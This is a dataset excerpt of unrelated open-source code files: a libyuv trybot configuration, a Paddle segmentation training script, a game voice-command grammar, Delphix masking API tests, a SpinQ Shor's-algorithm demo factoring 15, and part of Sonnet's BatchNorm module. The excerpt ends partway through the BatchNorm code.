filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_106_15771
|
# Copyright 2014 The LibYuv Project Authors. All rights reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
import re
import sys
def GetDefaultTryConfigs(bots=None):
"""Returns a list of ('bot', set(['tests']), optionally filtered by [bots].
For WebRTC purposes, we always return an empty list of tests, since we want
to run all tests by default on all our trybots.
"""
return { 'tryserver.libyuv': dict((bot, []) for bot in bots)}
# pylint: disable=W0613
def GetPreferredTryMasters(project, change):
files = change.LocalPaths()
bots = [
'win',
'win_rel',
'win_x64_rel',
'win_clang',
'win_clang_rel',
'win_x64_clang_rel',
'mac',
'mac_rel',
'mac_asan',
'ios',
'ios_rel',
'ios_arm64',
'ios_arm64_rel',
'linux',
'linux_rel',
'linux_memcheck',
'linux_tsan2',
'linux_asan',
'linux_msan',
'linux_ubsan',
'linux_ubsan_vptr',
'android',
'android_rel',
'android_clang',
'android_arm64',
'android_mips',
'android_x64',
'android_x86',
]
if not files or all(re.search(r'[\\/]OWNERS$', f) for f in files):
return {}
return GetDefaultTryConfigs(bots)
|
the-stack_106_15772
|
import logging
import os
import time
import timeit
import numpy as np
import matplotlib.pyplot as plt
from argparse import ArgumentParser
import paddle
import paddle.nn as nn
# user
from builders.model_builder import build_model
from builders.dataset_builder import build_dataset_train
from utils.utils import setup_seed, init_weight, netParams, init_logger
from utils.metric import get_iou
from utils.loss import CrossEntropyLoss2d, ProbOhemCrossEntropy2d
from utils.lr_scheduler import WarmupPolyLR
GLOBAL_SEED = 1234
def val(args, val_loader, model, logger):
"""
args:
val_loader: loaded for validation dataset
model: model
return: mean IoU and IoU class
"""
# evaluation mode
model.eval()
total_batches = len(val_loader)
data_list = []
for i, (input, label, size, name) in enumerate(val_loader):
start_time = time.time()
with paddle.no_grad():
output = model(input)
time_taken = time.time() - start_time
if (i + 1) % 100 == 0:
logger.info("[{}/{}] time: {:.4f}".format(i + 1, total_batches, time_taken))
output = output[0].numpy()
gt = label.numpy()[0].astype(np.uint8)
output = output.transpose(1, 2, 0)
output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)
data_list.append([gt.flatten(), output.flatten()])
meanIoU, per_class_iu = get_iou(data_list, args.classes)
model.train()
return meanIoU, per_class_iu
def train(args, train_loader, model, criterion, optimizer, scheduler, epoch, logger):
"""
args:
train_loader: loaded for training dataset
model: model
criterion: loss function
optimizer: optimization algorithm, such as ADAM or SGD
epoch: epoch number
return: average loss, per class IoU, and mean IoU
"""
epoch_loss = []
total_batches = len(train_loader)
logger.info("=====> the number of iterations per epoch: {}".format(total_batches))
st = time.time()
for iteration, batch in enumerate(train_loader, 0):
lr = optimizer.get_lr()
start_time = time.time()
images, labels, _, _ = batch
output = model(images)
loss = criterion(output, labels)
optimizer.clear_grad() # set the grad to zero
loss.backward()
optimizer.step()
scheduler.step()
epoch_loss.append(loss.item())
time_taken = time.time() - start_time
if (iteration + 1) % args.print_batch_step == 0:
logger.info('=====> epoch[{}/{}] iter: [{}/{}] cur_lr: {:.6f} loss: {:.6f} time:{:.4f}'.format(epoch + 1,
args.max_epochs,
iteration + 1,
total_batches,
lr,
loss.item(),
time_taken))
time_taken_epoch = time.time() - st
remain_time = time_taken_epoch * (args.max_epochs - 1 - epoch)
m, s = divmod(remain_time, 60)
h, m = divmod(m, 60)
logger.info("Remaining training time = {} hour {} minutes {} seconds".format(h, m, s))
average_epoch_loss_train = sum(epoch_loss) / len(epoch_loss)
return average_epoch_loss_train, lr
def train_model(args, logger):
"""
args:
args: global arguments
"""
h, w = map(int, args.input_size.split(','))
args.input_size = (h, w)
logger.info("=====> input size:{}".format(args.input_size))
logger.info(args)
if args.cuda:
logger.info("=====> use gpu id: '{}'".format(args.gpus))
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus
if not paddle.is_compiled_with_cuda():
raise Exception("No GPU found or Wrong gpu id, please run without --cuda")
# set the seed
setup_seed(GLOBAL_SEED)
logger.info("=====> set Global Seed: {}".format(GLOBAL_SEED))
# build the model and initialization
model = build_model(args.model, num_classes=args.classes)
init_weight(model, nn.initializer.KaimingNormal(), nn.BatchNorm2D, 1e-3, 0.1)
logger.info("=====> computing network parameters and FLOPs")
total_paramters = netParams(model)
logger.info("the number of parameters: {} ==> {} M".format(total_paramters, (total_paramters / 1e6)))
# load data and data augmentation
datas, trainLoader, valLoader = build_dataset_train(args)
logger.info('=====> Dataset statistics')
logger.info("data['classWeights']: {}".format(datas['classWeights']))
logger.info('mean and std: {}, {}'.format(datas['mean'], datas['std']))
# define loss function, respectively
weight = paddle.to_tensor(datas['classWeights'])
if args.dataset == 'camvid':
criteria = CrossEntropyLoss2d(weight=weight, ignore_label=ignore_label)
elif args.dataset == 'cityscapes':
min_kept = int(args.batch_size // len(args.gpus) * h * w // 16)
criteria = ProbOhemCrossEntropy2d(use_weight=True, ignore_label=ignore_label,
thresh=0.7, min_kept=min_kept)
else:
raise NotImplementedError(
"This repository now supports two datasets: cityscapes and camvid, {} is not included".format(args.dataset))
start_epoch = 1
# continue training
if args.checkpoint:
if os.path.isfile(args.checkpoint):
checkpoint = paddle.load(args.checkpoint)
start_epoch = checkpoint['epoch']
model.set_state_dict(checkpoint['model'])
logger.info("=====> loaded checkpoint '{}' (epoch {})".format(args.checkpoint, checkpoint['epoch']))
else:
logger.info("=====> no checkpoint found at '{}'".format(args.checkpoint))
model.train()
logger.info("Parameters: {} Seed: {}".format(str(total_paramters), GLOBAL_SEED))
# define optimization criteria
args.per_iter = len(trainLoader)
scheduler = WarmupPolyLR(learning_rate=args.lr, step_each_epoch=len(trainLoader),
epochs=args.max_epochs, warmup_epoch=500 / len(trainLoader), power=0.9)()
if args.dataset == 'camvid':
optimizer = paddle.optimizer.Adam(learning_rate=scheduler, parameters=model.parameters(),
weight_decay=2e-4)
elif args.dataset == 'cityscapes':
optimizer = paddle.optimizer.Momentum(learning_rate=scheduler, parameters=model.parameters(), momentum=0.9,
weight_decay=1e-4)
else:
raise NotImplementedError
lossTr_list = []
epoches = []
mIOU_val_list = []
best_metric = {'mIOU': 0, 'epoch': 0}
logger.info('=====> beginning training')
for epoch in range(start_epoch, args.max_epochs):
# training
lossTr, lr = train(args, trainLoader, model, criteria, optimizer, scheduler, epoch, logger)
lossTr_list.append(lossTr)
model_file_name = os.path.join(args.savedir, 'latest.params')
state = {"epoch": epoch + 1, "model": model.state_dict()}
paddle.save(state, model_file_name)
# validation
if epoch % args.eval_epoch == 0 or epoch == (args.max_epochs - 1):
epoches.append(epoch)
mIOU_val, per_class_iu = val(args, valLoader, model, logger)
mIOU_val_list.append(mIOU_val)
# record train information
logger.info("Epoch : {} Details".format(str(epoch)))
logger.info("Epoch No.: {}\tTrain Loss = {:.6f}\t mIOU(val) = {:.6f}\t lr= {:.6f}".format(epoch,
lossTr,
mIOU_val, lr))
if best_metric['mIOU'] < mIOU_val:
best_metric = {'mIOU': mIOU_val, 'epoch': epoch + 1}
model_file_name = os.path.join(args.savedir, 'best.params')
paddle.save(state, model_file_name)
logger.info('cur mIOU: {:.6f}, best mIOU: {:.6f}'.format(mIOU_val, best_metric['mIOU']))
else:
# record train information
logger.info("Epoch : " + str(epoch) + ' Details')
logger.info("Epoch No.: {}\tTrain Loss = {:.6f}\t lr= {:.6f}".format(epoch, lossTr, lr))
# draw plots for visualization
if epoch % 50 == 0 or epoch == (args.max_epochs - 1):
# Plot the figures per 50 epochs
fig1, ax1 = plt.subplots(figsize=(11, 8))
ax1.plot(range(start_epoch, epoch + 1), lossTr_list)
ax1.set_title("Average training loss vs epochs")
ax1.set_xlabel("Epochs")
ax1.set_ylabel("Current loss")
plt.savefig(args.savedir + "loss_vs_epochs.png")
plt.clf()
fig2, ax2 = plt.subplots(figsize=(11, 8))
ax2.plot(epoches, mIOU_val_list, label="Val IoU")
ax2.set_title("Average IoU vs epochs")
ax2.set_xlabel("Epochs")
ax2.set_ylabel("Current IoU")
plt.legend(loc='lower right')
plt.savefig(args.savedir + "iou_vs_epochs.png")
plt.close('all')
if __name__ == '__main__':
start = timeit.default_timer()
parser = ArgumentParser()
parser.add_argument('--model', default="DABNet", help="model name: Context Guided Network (CGNet)")
parser.add_argument('--dataset', default="cityscapes", help="dataset: cityscapes or camvid")
parser.add_argument('--data_root', default="", help="dataset folder")
parser.add_argument('--train_file', default="dataset/cityscapes/cityscapes_train_list.txt", help="dataset folder")
parser.add_argument('--val_file', default="dataset/cityscapes/cityscapes_val_list.txt", help="dataset folder")
parser.add_argument('--inform_data_file', default="dataset/inform/cityscapes_inform.pkl", help="dataset folder")
parser.add_argument('--max_epochs', type=int, default=1000,
help="the number of epochs: 300 for train set, 350 for train+val set")
parser.add_argument('--input_size', type=str, default="512,1024", help="input size of model")
parser.add_argument('--random_mirror', type=bool, default=True, help="input image random mirror")
parser.add_argument('--random_scale', type=bool, default=True, help="input image resize 0.5 to 2")
parser.add_argument('--num_workers', type=int, default=4, help=" the number of parallel threads")
parser.add_argument('--lr', type=float, default=4.5e-2, help="initial learning rate")
parser.add_argument('--batch_size', type=int, default=8, help="the batch size is set to 16 for 2 GPUs")
parser.add_argument('--savedir', default="./checkpoint/", help="directory to save the model snapshot")
parser.add_argument('--checkpoint', type=str, default="",
help="use this file to load last checkpoint for continuing training")
parser.add_argument('--classes', type=int, default=19,
help="the number of classes in the dataset. 19 and 11 for cityscapes and camvid, respectively")
parser.add_argument('--cuda', type=bool, default=True, help="running on CPU or GPU")
parser.add_argument('--gpus', type=str, default="0", help="default GPU devices (0,1)")
parser.add_argument('--print_batch_step', type=int, default=10, help="print ")
parser.add_argument('--eval_epoch', type=int, default=50, help="print ")
args = parser.parse_args()
if args.dataset == 'cityscapes':
args.classes = 19
args.input_size = '512,1024'
ignore_label = 255
elif args.dataset == 'camvid':
args.classes = 11
args.input_size = '360,480'
ignore_label = 11
else:
raise NotImplementedError(
"This repository now supports two datasets: cityscapes and camvid, %s is not included" % args.dataset)
if not os.path.exists(args.savedir):
os.makedirs(args.savedir)
logFileLoc = os.path.join(args.savedir, 'train.log')
logger = init_logger(logFileLoc)
train_model(args, logger)
end = timeit.default_timer()
hour = 1.0 * (end - start) / 3600
minute = (hour - int(hour)) * 60
logger.info("training time: %d hour %d minutes" % (int(hour), int(minute)))
|
the-stack_106_15773
|
import dragonfly as df
import title_menu, menu_utils, server, df_utils, game, letters, items, server
from game_menu import game_menu
inventory_wrapper = menu_utils.InventoryMenuWrapper()
def get_inventory_page(menu):
page = game_menu.get_page_by_name(menu, 'inventoryPage')
return page
async def focus_item(page, new_row, new_col):
menu = page['inventory']
await inventory_wrapper.focus_box(menu, new_row, new_col)
async def click_equipment_icon(page, item):
cmp = menu_utils.find_component_by_field(page['equipmentIcons'], 'name', item["name"])
await menu_utils.focus_component(cmp)
with server.player_items_stream() as stream:
player_items = await stream.next()
if player_items['cursorSlotItem'] and not player_items['equippedItems'][item['field']]:
await menu_utils.click_component(cmp)
else:
await menu_utils.focus_component(cmp)
mapping = {
"item <positive_index>": df_utils.async_action(focus_item, None, 'positive_index'),
"row <positive_index>": df_utils.async_action(focus_item, 'positive_index', None),
"trash can": menu_utils.simple_click("trashCan"),
"<equipment_icons>": df_utils.async_action(click_equipment_icon, 'equipment_icons'),
}
equipment_icons = {
"boots": {"name": "Boots", "field": "boots"},
"hat": {"name": "Hat", "field": "hat"},
"pants": {"name": "Pants", "field": "pants"},
"left ring | ring one": {"name": "Left Ring", "field": "leftRing"},
"right ring | ring to": {"name": "Right Ring", "field": "rightRing"},
"shirt": {"name": "Shirt", "field": "shirt"},
}
def load_grammar():
extras = [
df_utils.positive_index,
items.craftable_items_choice,
df.Choice('equipment_icons', equipment_icons)
]
grammar = menu_utils.build_menu_grammar('inventory_page', mapping, get_inventory_page, extras=extras)
grammar.load()
|
the-stack_106_15774
|
from unittest import TestCase
from unittest import main
import mock
import sys
from masking_api_60.api.application_api import ApplicationApi
from masking_api_60.models.application import Application
from masking_api_60.models.application_list import ApplicationList
from masking_api_60.models.page_info import PageInfo
from dxm.lib.DxApplication.DxApplicationList import DxApplicationList
from dxm.lib.DxEngine.DxMaskingEngine import DxMaskingEngine
from dxm.lib.DxApplication.app_worker import application_add
from dxm.lib.DxApplication.app_worker import application_list
def app_load(a, b, **kwargs):
"""
Create an output for get_all_application call
"""
pi = PageInfo(number_on_page=2, total=2)
applist = [Application(application_name="App1"), Application(application_name="App2"), Application(application_name="App3", application_id=3)]
apo = ApplicationList(page_info=pi, response_list=applist)
return apo
class TestApp(TestCase):
@mock.patch("dxm.lib.DxApplication.DxApplicationList.paginator", app_load)
def setUp(self):
self.dal = DxApplicationList()
self.dal.LoadApplications()
def test_application_add(self):
with mock.patch.object(
ApplicationApi, 'create_application',
return_value=None) as mock_method, \
mock.patch.object(
DxMaskingEngine, 'get_session',
return_value=None):
application_add(None, "Test1")
name, args, kwargs = mock_method.mock_calls[0]
self.assertEqual("Test1", args[0].application_name)
@mock.patch("dxm.lib.DxApplication.DxApplicationList.paginator", app_load)
def test_application_list(self):
with mock.patch.object(
DxMaskingEngine, 'get_session',
return_value=None):
application_list(None, "csv", "App1")
if not hasattr(sys.stdout, "getvalue"):
self.fail("need to run in buffered mode")
output = sys.stdout.getvalue().strip()
self.assertEquals(
output, '#Engine name,Application name\r\ntesteng,App1')
def test_get_applicationId_by_name(self):
self.assertEqual("App1", self.dal.get_applicationId_by_name("App1")[0])
def test_get_applicationId_by_name2(self):
self.assertEqual(3, self.dal.get_applicationId_by_name("App3")[0])
if __name__ == '__main__':
main(buffer=True, verbosity=2)
|
the-stack_106_15776
|
# Copyright 2021 SpinQ Technology Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from spinqkit import get_basic_simulator, get_compiler, BasicSimulatorConfig
from spinqkit import Circuit, GateBuilder, ControlledGate, QuantumRegister
from spinqkit import SWAP, H, X, CP
import numpy as np
from fractions import Fraction
from math import gcd
import random
def create_control_u(a, power):
amod15_builder = GateBuilder(4)
for iteration in range(power):
if a in [2,13]:
amod15_builder.append(SWAP, [0,1])
amod15_builder.append(SWAP, [1,2])
amod15_builder.append(SWAP, [2,3])
if a in [7,8]:
amod15_builder.append(SWAP, [2,3])
amod15_builder.append(SWAP, [1,2])
amod15_builder.append(SWAP, [0,1])
if a == 11:
amod15_builder.append(SWAP, [1,3])
amod15_builder.append(SWAP, [0,2])
if a in [7,11,13]:
for q in range(4):
amod15_builder.append(X, [q])
amod15 = amod15_builder.to_gate()
c_amod15 = ControlledGate(amod15)
return c_amod15
def qft_dagger(circ: Circuit, qreg: QuantumRegister, n: int):
for qubit in range(n//2):
circ << (SWAP, (qreg[qubit], qreg[n-qubit-1]))
for j in range(n):
for m in range(j):
circ << (CP, (qreg[m], qreg[j]), -np.pi/float(2**(j-m)))
circ << (H, qreg[j])
def qpe_amod15(a):
n_count = 8
circ = Circuit()
qreg = circ.allocateQubits(4+n_count)
for q in range(n_count):
circ << (H, qreg[q])
circ << (X, qreg[3+n_count])
for q in range(n_count):
qarg = [qreg[q]] + [qreg[i+n_count] for i in range(4)]
circ << (create_control_u(a, 2**q), qarg)
qft_dagger(circ, qreg, n_count)
engine = get_basic_simulator()
comp = get_compiler("native")
exe = comp.compile(circ, 0)
config = BasicSimulatorConfig()
config.configure_shots(1024)
config.configure_measure_qubits(list(range(n_count)))
result = engine.execute(exe, config)
readings = result.get_readings()
idx = random.randint(0, len(readings))
print('reading: ' + readings[idx])
phase = int(readings[idx][::-1], 2) / (2**n_count)
print('phase: ' + str(phase))
return phase
N = 15
a = 7
factor_found = False
attempt = 0
while not factor_found and attempt < 10:
attempt += 1
phase = qpe_amod15(a)
frac = Fraction(phase).limit_denominator(N)
r = frac.denominator
print("Result: r = %i" % r)
if phase != 0:
guesses = [gcd(a**(r//2)-1, N), gcd(a**(r//2)+1, N)]
factor_num = 0
for guess in guesses:
if guess not in [1,N] and (N % guess) == 0: # Check to see if guess is a factor
print("*** Non-trivial factor found: %i ***" % guess)
factor_num += 1
if factor_num == 2 and guesses[0] * guesses[1] == N:
factor_found = True
print("Guessed Factors: %i and %i" % (guesses[0], guesses[1]))
|
the-stack_106_15777
|
# Copyright 2017 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Batch normalization module for Sonnet.
This contains the module BatchNorm, which performs batch normalization on
its inputs. It has an optional post-normalization scale and offset, and it
maintains moving averages of the statistics for use at test time.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
from sonnet.python.modules import base
from sonnet.python.modules import util
import tensorflow as tf
from tensorflow.python.layers import utils
from tensorflow.python.training import moving_averages
def create_beta_initializer():
"""Returns a default initializer for the `beta` in batch norm."""
return tf.zeros_initializer()
def create_gamma_initializer():
"""Returns a default initializer for the `gamma` in batch norm."""
return tf.ones_initializer()
def create_mean_initializer():
"""Returns a default initializer for the `moving_mean` in batch norm."""
return tf.zeros_initializer()
def create_variance_initializer():
"""Returns a default initializer for the `moving_variance` in batch norm."""
return tf.ones_initializer()
class BatchNorm(base.AbstractModule):
"""Batch normalization module, including optional affine transformation.
This module maintains exponential moving averages of the mean and
variance, which can be optionally used to normalize at test time.
At training time, batch statistics (mean, variance) are not shared between
separate connections. The moving averages are shared between separate
connections. At both training and test time, the optional affine
transformation (`* gamma + beta`) is shared between separate connections.
This is also the case for distributed replica training, where the batch
statistics are not aggregated across replicas, but the moving averages are
shared globally.
When connecting the module to the graph, `is_training=True` means that
- Update ops are created to update the moving averages with the current
batch's statistics.
- Features are normalized using the *current batch's statistics*. The
`test_local_stats` setting is ignored. The moving averages are
**not** used.
whereas `is_training=False` means that
- Update ops are not created.
- Features are normalized using either:
- The test batch statistics if `test_local_stats=True` (default).
- The moving averages if `test_local_stats=False`.
Local batch statistics are used by default at test time, but the moving
averages can be used by specifying a flag when connecting. One often wants
to use local batch statistics at test time to track the progress while the
model is trained as it would ensure that moving average updates do not affect
the training curves. Once the training is finished, it's often advantageous
to use moving average statistics, since it would make evaluation agnostic to
the batch size, and might even lead to small improvements over the local
batch statistics.
You can either update the moving averages automatically by setting
`update_ops_collection=None` or by running the ops in the given collection,
by default tf.GraphKeys.UPDATE_OPS.
For example, to run the updates automatically:
bn = BatchNorm(update_ops_collection=None)
train_net = bn(train_inputs, is_training=True)
this does, however, have the effect of blocking the forwards pass of the
network until the update ops have been run and may have a small performance
penalty.
For example, to run the updates manually:
bn = BatchNorm()
train_net = bn(train_inputs, is_training=True)
...
update_ops = tf.group(*tf.get_collection(tf.GraphKeys.UPDATE_OPS))
train_op = tf.group(train_op, update_ops)
Then, whenever `train_op` is run so also are the moving average update ops.
Some batch normalization caveats:
- Batch normalization will remove the effect of adding a bias, so e.g.
`use_bias=False` should be used for an immediately preceding snt.Linear
module.
- If your data batches aren't i.i.d. then batch normalization can allow your
network to 'cheat' by using the batch statistics to peek at the rest of
the batch. This can exhibit itself as a higher test score with
`test_local_stats=True` than `test_local_stats=False`.
"""
GAMMA = "gamma"
BETA = "beta"
MOVING_MEAN = "moving_mean"
MOVING_VARIANCE = "moving_variance"
POSSIBLE_INITIALIZER_KEYS = {GAMMA, BETA, MOVING_MEAN, MOVING_VARIANCE}
POSSIBLE_PARTITIONER_KEYS = {GAMMA, BETA}
POSSIBLE_REGULARIZER_KEYS = {GAMMA, BETA}
def __init__(
self,
axis=None,
offset=True,
scale=False,
decay_rate=0.999,
eps=1e-3,
initializers=None,
partitioners=None,
regularizers=None,
update_ops_collection="update_ops",
fused=False,
name="batch_norm",
):
"""Constructs a BatchNorm module.
By default reduces over all input tensor dimensions apart from the final
dimension. This has the effect of treating pixels in 1D/2D/3D images as
additional elements of the minibatch.
If this is not the desired behaviour, the user can specify the tensor
indices to reduce over with `axis`.
Args:
axis: Optional iterable of indices of dimensions to reduce over. By
default `None` and all dimensions except the last are reduced over.
offset: Optional boolean to specify whether or not to apply a trained
component-wise bias after the batch normalization and scaling.
scale: Optional boolean to specify whether or not to apply a trained
component-wise scale after the batch normalization.
decay_rate: Decay rate of the exponential moving averages of the mean
and variance.
eps: Small number to avoid dividing by zero when diving by the standard
deviation.
initializers: Optional dict containing ops to initialize the weights of
the affine transform (`gamma` and `beta`).
partitioners: Optional dict containing partitioners to partition the
weights of the affine transform (`gamma` and `beta`).
regularizers: Optional dict containing regularizers for the weights of the
affine transform ('gamma' and 'beta'). As a default, no regularizers are
used. A regularizer should be a function that takes a single `Tensor` as
an input and returns a scalar `Tensor` output, e.g. the L1 and L2
regularizers in `tf.contrib.layers`.
update_ops_collection: Name of TensorFlow variable collection to add the
moving average update ops to. If `None`, we instead add the update ops
as control dependencies of the output of the module. This may result in
some slowdown, as the feed-forward of the network is now blocked. By
default, `tf.GraphKeys.UPDATE_OPS`.
fused: Use nn.fused_batch_norm if True, nn.batch_normalization otherwise.
name: Name of the module.
Raises:
KeyError: If `initializers` contains any keys other than `gamma`, `beta`,
`moving_mean` or `moving_variance`.
KeyError: If `partitioners` or `regularizers` contains any keys other
than `gamma` or `beta`.
TypeError: If any of the given initializers, partitioners or regularizers
are not callable.
"""
super(BatchNorm, self).__init__(name=name)
self._axis = axis
self._offset = offset
self._scale = scale
self._decay_rate = decay_rate
self._eps = eps
self._update_ops_collection = update_ops_collection
self._fused = fused
self._initializers = util.check_initializers(initializers, self.POSSIBLE_INITIALIZER_KEYS)
self._partitioners = util.check_partitioners(partitioners, self.POSSIBLE_PARTITIONER_KEYS)
self._regularizers = util.check_regularizers(regularizers, self.POSSIBLE_REGULARIZER_KEYS)
def _build_statistics(self, input_batch, axis, use_batch_stats, stat_dtype):
"""Builds the statistics part of the graph when using moving variance.
Args:
input_batch: Input batch Tensor.
axis: Indices of `input_batch` to reduce over.
use_batch_stats: Boolean to indicate if batch statistics should be
calculated, otherwise moving averages are returned.
stat_dtype: TensorFlow datatype to use for the moving mean and variance.
Returns:
Tuple of (mean, variance), each of the same datatype as `input_batch`.
"""
# Set up our moving statistics. When connecting in parallel, this is shared.
if self.MOVING_MEAN not in self._initializers:
self._initializers[self.MOVING_MEAN] = create_mean_initializer()
self._moving_mean = tf.get_variable(
"moving_mean",
dtype=stat_dtype,
shape=self._mean_shape,
collections=[
tf.GraphKeys.MOVING_AVERAGE_VARIABLES,
tf.GraphKeys.GLOBAL_VARIABLES,
],
initializer=self._initializers[self.MOVING_MEAN],
trainable=False,
)
if self.MOVING_VARIANCE not in self._initializers:
self._initializers[self.MOVING_VARIANCE] = create_variance_initializer()
self._moving_variance = tf.get_variable(
"moving_variance",
dtype=stat_dtype,
shape=self._mean_shape,
collections=[
tf.GraphKeys.MOVING_AVERAGE_VARIABLES,
tf.GraphKeys.GLOBAL_VARIABLES,
],
initializer=self._initializers[self.MOVING_VARIANCE],
trainable=False,
)
def build_batch_stats():
"""Builds the batch statistics calculation ops."""
mean, variance = tf.nn.moments(input_batch, axis, keep_dims=True, name="normalize_moments")
return mean, variance
def build_moving_stats():
"""Retrieves the moving statistics."""
# If necessary, cast the moving statistics to match the input type.
# This is required by tf.nn.batch_normalization.
input_dtype = input_batch.dtype.base_dtype
if stat_dtype == input_dtype:
return (
tf.identity(self._moving_mean),
tf.identity(self._moving_variance),
)
else:
return (
tf.cast(self._moving_mean, input_dtype),
tf.cast(self._moving_variance, input_dtype),
)
mean, variance = utils.smart_cond(
use_batch_stats,
build_batch_stats,
build_moving_stats,
)
return mean, variance
def _build_update_ops(self, mean, variance, is_training):
"""Builds the moving average update ops when using moving variance.
Args:
mean: The mean value to update with.
variance: The variance value to update with.
is_training: Boolean Tensor to indicate if we're currently in
training mode.
Returns:
Tuple of `(update_mean_op, update_variance_op)` when `is_training` is or
could be `True`. Returns `None` when `is_training=False`.
"""
def build_update_ops():
"""Builds the exponential moving average update ops."""
update_mean_op = moving_averages.assign_moving_average(
variable=self._moving_mean,
value=mean,
decay=self._decay_rate,
zero_debias=False,
name="update_moving_mean",
).op
update_variance_op = moving_averages.assign_moving_average(
variable=self._moving_variance,
value=variance,
decay=self._decay_rate,
zero_debias=False,
name="update_moving_variance",
).op
return update_mean_op, update_variance_op
def build_no_ops():
return (tf.no_op(), tf.no_op())
# Only make the ops if we know that `is_training=True`, or the value of
# `is_training` is unknown.
is_training_const = utils.constant_value(is_training)
if is_training_const is None or is_training_const:
update_mean_op, update_variance_op = utils.smart_cond(
is_training,
build_update_ops,
build_no_ops,
)
return (update_mean_op, update_variance_op)
else:
return None
def _infer_fused_data_format(self, input_batch):
"""Infers the data format for the fused batch norm.
It uses the axis option to infer this information. Specifically, the
axis value (0, 1, 2) corresponds to data format NHWC and the
axis value (0, 2, 3) to data format NCHW.
Args:
input_batch: A Tensor of arbitrary dimension.
Returns:
A string description of the data format NHWC or NCHW.
Raises:
NotImplementedError: for input of dimensionality different from 4.
ValueError: for axis configuration different from (0, 1, 2) and (0, 2, 3).
"""
input_shape = input_batch.get_shape().as_list()
input_shape_len = len(input_shape)
if input_shape_len != 4:
raise NotImplementedError(
"fused batch norm supports only input with "
"4 dimensions, it received input of "
"dimensionality {:d}".format(input_shape_len)
)
axis = range(input_shape_len)[:-1] if self._axis is None else self._axis
axis = tuple(axis)
if axis == (0, 1, 2):
# Reduce over the last dimension.
return "NHWC"
elif axis == (0, 2, 3):
# Reduce over the second dimension.
return "NCHW"
else:
raise ValueError(
"Invalid axis option {}. This does not correspond to"
" either the NHWC format (0, 1, 2) or the NCHW "
"(0, 2, 3).".format(axis)
)
def _fused_batch_norm_op(self, input_batch, mean, variance, use_batch_stats):
"""Creates a fused batch normalization op."""
# Store the original shape of the mean and variance.
mean_shape = mean.get_shape()
variance_shape = variance.get_shape()
# The fused batch norm expects the mean, variance, gamma and beta
# tensors to have dimension 1, so we flatten them to remove the
# extra dimensions.
gamma_flatten = tf.reshape(self._gamma, shape=(-1,))
beta_flatten = tf.reshape(self._beta, shape=(-1,))
flatten_mean = tf.reshape(mean, shape=(-1,))
flatten_variance = tf.reshape(variance, shape=(-1,))
use_batch_stats = tf.convert_to_tensor(use_batch_stats)
common_args = {
"scale": gamma_flatten,
"offset": beta_flatten,
"epsilon": self._eps,
"data_format": self._infer_fused_data_format(input_batch),
"name": "batch_norm",
}
def use_batch_stats_fused_batch_norm():
return tf.nn.fused_batch_norm(
input_batch,
mean=None,
variance=None,
is_training=True,
**common_args,
)
def moving_average_fused_batch_norm():
return tf.nn.fused_batch_norm(
input_batch,
mean=flatten_mean,
variance=flatten_variance,
is_training=False,
**common_args,
)
batch_norm_op, mean, variance = utils.smart_cond(
use_batch_stats,
use_batch_stats_fused_batch_norm,
moving_average_fused_batch_norm,
)
mean = tf.reshape(mean, mean_shape)
variance = tf.reshape(variance, variance_shape)
return batch_norm_op, mean, variance
def _batch_norm_op(self, input_batch, mean, variance, use_batch_stats, stat_dtype):
"""Creates a batch normalization op.
It uses the tf.nn.batch_normalization op by default and the
tf.nn.fused_batch_norm op to support fused batch normalization.
Args:
input_batch: A input Tensor of arbitrary dimension.
mean: A mean tensor, of the same dtype as `input_batch`.
variance: A variance tensor, of the same dtype as `input_batch`.
use_batch_stats: A bool value that indicates whether the operation should
use the batch statistics.
stat_dtype: TensorFlow datatype used for the moving mean and variance.
Returns:
A batch normalization operation.
The current mean tensor, of datatype `stat_dtype`.
The current variance tensor, of datatype `stat_dtype`.
"""
if self._fused:
# For the non-training case where not using batch stats,
# pass in the moving statistic variables directly.
# These will already be in the correct dtype, even for float16 input.
batch_norm_op, mean, variance = self._fused_batch_norm_op(
input_batch,
self._moving_mean,
self._moving_variance,
use_batch_stats,
)
else:
batch_norm_op = tf.nn.batch_normalization(
input_batch,
mean,
variance,
self._beta,
self._gamma,
self._eps,
name="batch_norm",
)
# We'll echo the supplied mean and variance so that they can also be used
# to update the moving statistics. Cast to matching type if necessary.
if input_batch.dtype.base_dtype != stat_dtype:
mean = tf.cast(mean, stat_dtype)
variance = tf.cast(variance, stat_dtype)
return batch_norm_op, mean, variance
def _build_scale_offset(self, dtype):
"""Sets up optional scale and offset factors."""
# tf.nn.fused_batch_norm accepts float16 batch data, but not scale/offset.
if self._fused and dtype == tf.float16:
dtype = tf.float32
# The fused batch norm operation needs the beta, gamma variables,
# so in this case we build them and set the trainable option according
# to the values of _offset and _scale.
self._beta = None
if self._offset or self._fused:
if self.BETA not in self._initializers:
self._initializers[self.BETA] = create_beta_initializer()
self._beta = tf.get_variable(
self.BETA,
dtype=dtype,
shape=self._mean_shape,
initializer=self._initializers[self.BETA],
partitioner=self._partitioners.get(self.BETA, None),
regularizer=self._regularizers.get(self.BETA, None),
trainable=self._offset,
)
self._gamma = None
if self._scale or self._fused:
if self.GAMMA not in self._initializers:
self._initializers[self.GAMMA] = create_gamma_initializer()
self._gamma = tf.get_variable(
self.GAMMA,
dtype=dtype,
shape=self._mean_shape,
initializer=self._initializers[self.GAMMA],
partitioner=self._partitioners.get(self.GAMMA, None),
